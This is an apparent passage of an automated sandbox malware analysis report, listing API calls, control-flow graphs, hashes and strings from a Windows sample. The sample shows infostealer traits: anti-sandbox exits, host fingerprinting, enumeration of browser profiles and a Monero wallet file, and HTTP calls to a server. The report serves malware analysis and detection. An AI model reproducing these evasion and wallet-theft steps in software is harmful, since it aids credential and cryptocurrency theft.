                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 003fb3a971c3bf6a8057fa6a6aa7361b950221379e6ce3a7f66e3524eef0b63c
                          • Instruction ID: 47d7e907cb2cc070a243e7051464beb162b1e93bdb3854e79790cf2ceec98718
                          • Opcode Fuzzy Hash: 003fb3a971c3bf6a8057fa6a6aa7361b950221379e6ce3a7f66e3524eef0b63c
                          • Instruction Fuzzy Hash: 7C517BB4A04209EFCB04DFA6C958FBE77B5AF45704F18805DE80AAB241D770EA45DB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 cc7500-cc754a GetWindowsDirectoryA 1357 cc754c 1356->1357 1358 cc7553-cc75c7 GetVolumeInformationA call cc8d00 * 3 1356->1358 1357->1358 1365 cc75d8-cc75df 1358->1365 1366 cc75fc-cc7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 cc75e1-cc75fa call cc8d00 1365->1367 1369 cc7628-cc7658 wsprintfA call cca740 1366->1369 1370 cc7619-cc7626 call cca740 1366->1370 1367->1365 1377 cc767e-cc768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CC7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC760A
                          • wsprintfA.USER32 ref: 00CC7640
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 08dd9e6ebe804908c61e1a0fea5882e81c664515fc0d8e368669d95ee89d43d7
                          • Instruction ID: c3cf1650de1be0e27c0ee08ac84cfd564f954f03100b11008efe64560df22621
                          • Opcode Fuzzy Hash: 08dd9e6ebe804908c61e1a0fea5882e81c664515fc0d8e368669d95ee89d43d7
                          • Instruction Fuzzy Hash: 1B416EB1904248ABDB10DB95DC45FEEBBB8EB48704F140199F509AB280DB786A48CFA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892200), ref: 00CC98A1
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892380), ref: 00CC98BA
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892098), ref: 00CC98D2
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892188), ref: 00CC98EA
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892218), ref: 00CC9903
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018999C0), ref: 00CC991B
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018853F0), ref: 00CC9933
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018852B0), ref: 00CC994C
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018922F0), ref: 00CC9964
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892308), ref: 00CC997C
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892158), ref: 00CC9995
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892320), ref: 00CC99AD
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,018855B0), ref: 00CC99C5
                            • Part of subcall function 00CC9860: GetProcAddress.KERNEL32(74DD0000,01892230), ref: 00CC99DE
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CB11D0: ExitProcess.KERNEL32 ref: 00CB1211
                            • Part of subcall function 00CB1160: GetSystemInfo.KERNEL32(?), ref: 00CB116A
                            • Part of subcall function 00CB1160: ExitProcess.KERNEL32 ref: 00CB117E
                            • Part of subcall function 00CB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CB112B
                            • Part of subcall function 00CB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00CB1132
                            • Part of subcall function 00CB1110: ExitProcess.KERNEL32 ref: 00CB1143
                            • Part of subcall function 00CB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CB123E
                            • Part of subcall function 00CB1220: __aulldiv.LIBCMT ref: 00CB1258
                            • Part of subcall function 00CB1220: __aulldiv.LIBCMT ref: 00CB1266
                            • Part of subcall function 00CB1220: ExitProcess.KERNEL32 ref: 00CB1294
                            • Part of subcall function 00CC6770: GetUserDefaultLangID.KERNEL32 ref: 00CC6774
                            • Part of subcall function 00CB1190: ExitProcess.KERNEL32 ref: 00CB11C6
                            • Part of subcall function 00CC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                            • Part of subcall function 00CC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                            • Part of subcall function 00CC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                            • Part of subcall function 00CC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                            • Part of subcall function 00CC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                            • Part of subcall function 00CC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00CC6AF9
                          • Sleep.KERNEL32(00001770), ref: 00CC6B04
                          • CloseHandle.KERNEL32(?,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6B1A
                          • ExitProcess.KERNEL32 ref: 00CC6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 5fca923c070927aebac6e05da594c03aa30b818e41722b2135eb4a46c71429ad
                          • Instruction ID: b19addee5f3a9abd2f5029c2572cc012883888da5c73ac59d6ae86a0edffac1f
                          • Opcode Fuzzy Hash: 5fca923c070927aebac6e05da594c03aa30b818e41722b2135eb4a46c71429ad
                          • Instruction Fuzzy Hash: 97312A70900208ABDB04FBF1DC5AFEE7778AF44344F54452DF612A61C2DF706A05EAA6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 cb1220-cb1247 call cc89b0 GlobalMemoryStatusEx 1439 cb1249-cb1271 call ccda00 * 2 1436->1439 1440 cb1273-cb127a 1436->1440 1442 cb1281-cb1285 1439->1442 1440->1442 1444 cb129a-cb129d 1442->1444 1445 cb1287 1442->1445 1447 cb1289-cb1290 1445->1447 1448 cb1292-cb1294 ExitProcess 1445->1448 1447->1444 1447->1448
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CB123E
                          • __aulldiv.LIBCMT ref: 00CB1258
                          • __aulldiv.LIBCMT ref: 00CB1266
                          • ExitProcess.KERNEL32 ref: 00CB1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: feb478ed646a2c0ef7ac1edec3b395ae247fe90c0e2c84119ad6341aea8c1211
                          • Instruction ID: b1098b7f49f9420fb6ba93bee292e7b6978f218000df0c316636e618d1293eef
                          • Opcode Fuzzy Hash: feb478ed646a2c0ef7ac1edec3b395ae247fe90c0e2c84119ad6341aea8c1211
                          • Instruction Fuzzy Hash: 9D0162B0D40308FAEB10DBE0CC49FEEB778AF54701F648068EB05BA1C0D7746645979A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 cc6af3 1451 cc6b0a 1450->1451 1453 cc6b0c-cc6b22 call cc6920 call cc5b10 CloseHandle ExitProcess 1451->1453 1454 cc6aba-cc6ad7 call ccaad0 OpenEventA 1451->1454 1459 cc6ad9-cc6af1 call ccaad0 CreateEventA 1454->1459 1460 cc6af5-cc6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00CC6AF9
                          • Sleep.KERNEL32(00001770), ref: 00CC6B04
                          • CloseHandle.KERNEL32(?,00000000,?,018999B0,?,00CD110C,?,00000000,?,00CD1110,?,00000000,00CD0AEF), ref: 00CC6B1A
                          • ExitProcess.KERNEL32 ref: 00CC6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a398132a145226431b9fb543631bcef3fa744d102029fdcdbafca6fb92624f08
                          • Instruction ID: f167689c6c1b7501dd75252e0701805b019b3e16aa2c3f29125d8859210f6b41
                          • Opcode Fuzzy Hash: a398132a145226431b9fb543631bcef3fa744d102029fdcdbafca6fb92624f08
                          • Instruction Fuzzy Hash: 25F0BEB0900209AFE700ABA2DD1AFBE7B34EB04300F10442DF516F51C0CBB02941FAA6

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB6280: InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                            • Part of subcall function 00CB6280: StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                            • Part of subcall function 00CB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                            • Part of subcall function 00CB6280: HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                            • Part of subcall function 00CB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                            • Part of subcall function 00CB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CB112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00CB1132
                          • ExitProcess.KERNEL32 ref: 00CB1143
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00CB10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00CB10F7
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          APIs
                            • Part of subcall function 00CC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                            • Part of subcall function 00CC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                            • Part of subcall function 00CC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                            • Part of subcall function 00CC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                            • Part of subcall function 00CC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                            • Part of subcall function 00CC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                          • ExitProcess.KERNEL32 ref: 00CB11C6
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          APIs
                          • wsprintfA.USER32 ref: 00CC38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC38E3
                          • lstrcat.KERNEL32(?,?), ref: 00CC3935
                          • StrCmpCA.SHLWAPI(?,00CD0F70), ref: 00CC3947
                          • StrCmpCA.SHLWAPI(?,00CD0F74), ref: 00CC395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC3C67
                          • FindClose.KERNEL32(000000FF), ref: 00CC3C7C
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00CD0B32,00CD0B2B,00000000,?,?,?,00CD13F4,00CD0B2A), ref: 00CBBEF5
                          • StrCmpCA.SHLWAPI(?,00CD13F8), ref: 00CBBF4D
                          • StrCmpCA.SHLWAPI(?,00CD13FC), ref: 00CBBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00CBC7D1
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          APIs
                          • wsprintfA.USER32 ref: 00CC492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                          • StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                          • StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CC4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC4587
                          • wsprintfA.USER32 ref: 00CC45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC45BD
                          • StrCmpCA.SHLWAPI(?,00CD0FC4), ref: 00CC45EB
                          • StrCmpCA.SHLWAPI(?,00CD0FC8), ref: 00CC4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC468B
                          • FindClose.KERNEL32(000000FF), ref: 00CC46A0
                          • lstrcat.KERNEL32(?,0189E5E8), ref: 00CC46C5
                          • lstrcat.KERNEL32(?,0189D848), ref: 00CC46D8
                          • lstrlen.KERNEL32(?), ref: 00CC46E5
                          • lstrlen.KERNEL32(?), ref: 00CC46F6
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          APIs
                          • wsprintfA.USER32 ref: 00CC3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CC3EDA
                          • StrCmpCA.SHLWAPI(?,00CD0FAC), ref: 00CC3F08
                          • StrCmpCA.SHLWAPI(?,00CD0FB0), ref: 00CC3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CC406C
                          • FindClose.KERNEL32(000000FF), ref: 00CC4081
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: c4b43df57311723bc054fa7c614ae39ebeffa185f5a3f0af37b45fb6c485f693
                          • Instruction ID: d77dba6dc1755d5fb2eb2d8b258d72cda84eef78c89de13b3bab4ae97253eec9
                          • Opcode Fuzzy Hash: c4b43df57311723bc054fa7c614ae39ebeffa185f5a3f0af37b45fb6c485f693
                          • Instruction Fuzzy Hash: BD5133B1900218ABCB24EBA5DC89FFA737CBB88300F44859DF65D96040EB759B89CF51
                          APIs
                          • wsprintfA.USER32 ref: 00CBED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00CBED55
                          • StrCmpCA.SHLWAPI(?,00CD1538), ref: 00CBEDAB
                          • StrCmpCA.SHLWAPI(?,00CD153C), ref: 00CBEDC1
